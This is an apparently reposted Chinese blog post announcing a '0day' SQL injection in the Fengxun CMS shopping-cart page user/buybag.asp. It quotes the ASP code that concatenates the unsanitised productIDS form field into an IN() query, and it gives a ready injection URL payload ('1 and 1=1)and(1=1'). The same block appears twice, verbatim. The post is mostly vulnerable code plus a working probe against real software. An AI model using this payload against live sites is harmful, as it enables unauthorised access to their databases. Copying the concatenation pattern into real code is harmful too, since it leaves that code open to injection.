风迅注入0day
user/buybag.asp
40行開始?
if request.Form("action")="makeorder" then
Dim productIDS,OrderRs,BagRs,OrderDetail,OrderNumber,ExpressCompany
productIDS=DelHeadAndEndDot(request.Form("productIDS"))//這個函數功能是去掉頭尾的逗號?
Set OrderRs=Server.CreateObject(G_FS_RS)
Set BagRs=Server.CreateObject(G_FS_RS)
Set OrderDetail=Server.CreateObject(G_FS_RS)?
OrderRs.open "Select * From FS_ME_Order where 1=2",User_Conn,1,3
BagRs.open "Select mid,BuyType,AddTime,UserNumber,BuyMoney,BuyNumber from FS_ME_BuyBag where MID in("&productIDS&")",User_Conn,1,1
in()中注射發生!!
user/buybag.asp?action=makeorder&productIDS=1 and 1=1)and(1=1
40行開始?
if request.Form("action")="makeorder" then
Dim productIDS,OrderRs,BagRs,OrderDetail,OrderNumber,ExpressCompany
productIDS=DelHeadAndEndDot(request.Form("productIDS"))//這個函數功能是去掉頭尾的逗號?
Set OrderRs=Server.CreateObject(G_FS_RS)
Set BagRs=Server.CreateObject(G_FS_RS)
Set OrderDetail=Server.CreateObject(G_FS_RS)?
OrderRs.open "Select * From FS_ME_Order where 1=2",User_Conn,1,3
BagRs.open "Select mid,BuyType,AddTime,UserNumber,BuyMoney,BuyNumber from FS_ME_BuyBag where MID in("&productIDS&")",User_Conn,1,1
in()中注射發生!!
user/buybag.asp?action=makeorder&productIDS=1 and 1=1)and(1=1
轉載于:https://www.cnblogs.com/allyesno/archive/2007/08/22/865542.html
總結
- 上一篇: 告别程序员生涯,一点感慨,与诸君共勉(转
- 下一篇: 二十年来一直没搞清楚的一个问题